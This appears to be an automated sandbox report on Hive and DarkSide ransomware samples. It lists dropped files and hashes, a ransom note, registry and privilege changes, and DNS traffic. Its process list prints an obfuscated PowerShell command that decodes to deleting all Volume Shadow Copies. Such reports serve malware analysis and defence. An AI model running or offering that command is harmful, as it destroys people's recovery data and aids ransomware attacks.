C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

Network

Files

memory/4004-0-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\$Recycle.Bin\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini

MD5 f66bd8c4a0c3f208d38e64628d9a329d
SHA1 42b37f09b12463003ad23b3aa0e68c77d0aef3f8
SHA256 4bd462a2312dabd402bbeb87bf13e933ac47284ff027d547cf46fdab7e13791b
SHA512 fec4fc2f2a91f04ab87225020f12f2bddc1a0316a482d041999b6293e8e4ca0f8ce6b9a0dbaae61089c2a5909ef0ef5e27a51c7912fb1b3318b6aad950e9e4d7

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

memory/4004-865-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-2733-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-3489-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-4232-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-4981-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-6249-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-9141-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-9907-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.P7EsMTWem2f4DapaPblE9Dlz_RIz8E18M8Wn___Y6AI.hive

MD5 9e95c9286aa916de80a68960ed66b52d
SHA1 f2f8c6fd0ea28bca1a63cd2594afc3942b416c3f
SHA256 08ceabcb4f55ab059a42a4588e67b9aac327e3fe45047927a1fa7b30861a0576
SHA512 1884c4398cbd4f7300ca03a25b1fcc814a8d2809dd438409ac9e2d1ca764569e55c6bfc60235949dade710ce0549fcbf41b929179f677219e076a895fd8d5db1

memory/4004-11851-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 c9c0dfee4ea69bbc4edbbd1684c97f7d
SHA1 1fb65f2c4b44b8c8795a8f3b7303137869d4a132
SHA256 dc7ada2e6705249f64ee7a50ad5c268ea469a38d691d05b32991ca3bb426d380
SHA512 a4c6b4bd7c21b9e54feb21e8fbf62debd93c9eb41da683156d11a24e93283e14628160780b6130df5e27704d8a5ec0bd87244d2e03c8cb735fd7809749abe5f5

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648406469969338.txt

MD5 ecaea544af9da1114077b951d8cb520d
SHA1 5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512 dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

memory/4004-11876-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-11877-0x0000000000F10000-0x00000000011E9000-memory.dmp

F:\$RECYCLE.BIN\HOW_TO_DECRYPT.txt

MD5 ee4ad142674725d6d9b58c9c3bb836dc
SHA1 ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256 fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512 a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

memory/4004-18145-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-21786-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23184-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23189-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23196-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23203-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23211-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23216-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23223-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-23268-0x0000000000F10000-0x00000000011E9000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1695s

Max time network

1156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (133) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5a727a6e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5a727a6e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5a727a6e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e\ = "5a727a6e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
